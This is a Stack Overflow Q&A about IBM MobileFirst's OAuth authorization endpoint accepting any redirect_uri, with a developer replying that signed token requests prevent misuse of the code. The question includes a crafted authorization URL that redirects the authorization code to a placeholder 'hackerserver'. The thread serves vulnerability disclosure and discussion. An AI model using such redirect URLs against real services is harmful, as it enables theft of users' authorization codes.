1

I login into application via security check (UserAuthSecurityCheck).

I frame a URL for authorization end point and changed the redirect_uri to different server(hacker server).

http://mobilefirstserver:port/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope=UserAuthSecurityCheck&redirect_uri=http://hackerserver:port/context/getdata

When I make this request, it delivers the authorization code to hacker server. http://hackerserver:port/context/getdata?code=authorization_code

Now I can able to access this authorization_code in hacker server.

I believe hacker can take advantage of this and he makes you click a link in different browser tab and can able to execute the request to authorization end point.

Why no whitelisting done in the framework for "redirect_uri"?

How to mitigate this issue?

Open redirects must be avoided as per oAuth specification
https://www.rfc-editor.org/rfc/rfc6749#section-10.15

Community
  • 1
  • 1
Vignesh Sn
  • 110
  • 8

1 Answers1

1

you are right that we are not whitelisting the redirect_uri, however, the MobileFirst Server is mitigating this vulnerability by forcing the token request (that uses the authorization code) to be signed - thus making the attack invalid.

Disclaimer: I'm a developer in the IBM MobileFirst Foundation team.

Idan Adar
  • 44,156
  • 13
  • 50
  • 89
idohu
  • 133
  • 3
  • 7
  • Thanks for answering. But I still see problem with this approach. I can able to change the "redirect_uri" and send Authorization Code to different server. If I get hold of Authorization Code in different server. I can able to hit the token end point using this Authorization Code to get Access Token. So it doesn't matters if the Authorization Code is signed or unsigned. Because MF server is the one which is providing the Authorization Code. – Vignesh Sn Jan 03 '17 at 07:28
  • The client needs to sign the code with his private key and that is validated in the server before issuing the token, so the authorization code alone will not be useful. – idohu Jan 03 '17 at 12:24